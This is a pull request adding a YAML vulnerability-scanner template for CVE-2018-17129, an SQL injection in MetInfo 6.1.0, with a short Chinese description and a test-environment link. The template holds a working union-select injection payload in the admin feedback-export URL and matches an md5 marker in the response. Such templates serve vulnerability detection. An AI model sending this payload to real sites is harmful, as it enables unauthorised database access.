### PR TITLE
add metinfo-cve-2018-17129-sqli

### DIFF
--- a/pocs/metinfo-cve-2018-17129-sqli.yml
+++ b/pocs/metinfo-cve-2018-17129-sqli.yml
@@ -5,7 +5,7 @@ rules:
   - method: GET
     path: /admin/index.php?lang=cn&anyid=29&n=feedback&c=feedback_admin&a=doexport&class1=-1/**/union/**/select/**/md5({{rand}})&met_fd_export=-1
     expression: |
-      response.status == 200 && 'md5(string(rand)' in response.headers
+      response.status == 200 && "md5(string(rand)" in response.headers
 detail:
   author: pa55w0rd(www.pa55w0rd.online/)
   Affected Version: "MetInfo 6.1.0"

--- a/pocs/metinfo-cve-2018-17129-sqli.yml
+++ b/pocs/metinfo-cve-2018-17129-sqli.yml
@@ -1,0 +1,13 @@
+name: poc-yaml-metinfo-cve-2018-17129-sqli
+set:
+  rand: randomInt(10000, 99999)
+rules:
+  - method: GET
+    path: /admin/index.php?lang=cn&anyid=29&n=feedback&c=feedback_admin&a=doexport&class1=-1/**/union/**/select/**/md5({{rand}})&met_fd_export=-1
+    expression: |
+      response.status == 200 && 'md5(string(rand)' in response.headers
+detail:
+  author: pa55w0rd(www.pa55w0rd.online/)
+  Affected Version: "MetInfo 6.1.0"
+  links:
+    - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17129


### PR DESCRIPTION
## 本 poc 是检测什么漏洞的
metinfo-cve-2018-17129-sqli

## 测试环境
https://www.metinfo.cn/upload/file/MetInfo6.1.2.zip
## 备注
![image](https://user-images.githubusercontent.com/16274549/90879751-f66d7b80-e3d9-11ea-9052-5b79a8117417.png)
